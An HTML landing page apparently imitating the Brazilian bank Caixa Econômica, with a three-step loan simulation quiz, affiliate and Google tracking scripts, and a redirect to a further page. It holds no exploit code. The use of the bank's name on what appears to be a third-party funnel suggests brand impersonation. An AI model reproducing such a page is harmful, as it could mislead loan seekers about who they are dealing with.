﻿<!DOCTYPE html><html><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica - Simulação de Empréstimo</title>
    

<script src="../scripts/utms/latest-3.js" data-utmify-prevent-subids="" async="" defer=""></script>
   
    

    <link rel="stylesheet" href="css/H4vSs85Hk4LH.css">
</head>

<body>
    <div class="container">
        <div class="quiz-container">
            <!-- Header -->
            <div class="header" style="background-color: white; display: flex; justify-content: center;">
                <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
            </div>

            <!-- Step 1 -->
            <div class="step" id="step1">
                <h2>Qual o motivo do seu empréstimo?</h2>

                <p class="subtitle">Conte-nos um pouco sobre seus objetivos</p>

                <div class="progress-bar">
                    <div class="progress" style="width: 33%"></div>
                </div>

                <p class="step-indicator">Pergunta 1 de 3</p>

                <div class="options">
                    <button class="option-btn">Pagar contas</button>

                    <button class="option-btn">Reformar a casa</button>

                    <button class="option-btn">Comprar um veículo</button>

                    <button class="option-btn">Investir no meu negócio</button>
                </div>
            </div>

            <!-- Step 2 -->
            <div class="step" id="step2" style="display: none;">
                <h2>Qual a sua faixa de renda mensal?</h2>

                <p class="subtitle">Isso nos ajuda a encontrar a melhor opção para você</p>

                <div class="progress-bar">
                    <div class="progress" style="width: 66%"></div>
                </div>

                <p class="step-indicator">Pergunta 2 de 3</p>

                <div class="options">
                    <button class="option-btn">R$1.500 - R$2.000</button>

                    <button class="option-btn">R$2.500 - R$3.000</button>

                    <button class="option-btn">R$3.500 - R$7.000</button>

                    <button class="option-btn">Acima de R$10.000</button>
                </div>

                <button class="continue-btn">Continuar</button>
            </div>

            <!-- Step 3 -->
            <div class="step" id="step3" style="display: none;">
                <h2>Qual o tipo da sua renda?</h2>

                <p class="subtitle">Selecione a opção que melhor descreve sua situação atual</p>

                <div class="progress-bar">
                    <div class="progress" style="width: 100%"></div>
                </div>

                <p class="step-indicator">Pergunta 3 de 3</p>

                <div class="options">
                    <button class="option-btn">Empregado com carteira assinada</button>

                    <button class="option-btn">Profissional autônomo / Empresário</button>

                    <button class="option-btn">Atualmente desempregado</button>
                </div>

                <button class="continue-btn" onclick="redirectWithUTMs()">Concluir</button>
            </div>
        </div>
    </div>

    <script src="js/9l13MtagdjSe.js"></script>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-05' + window.location.search;
        }
    </script>



</body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>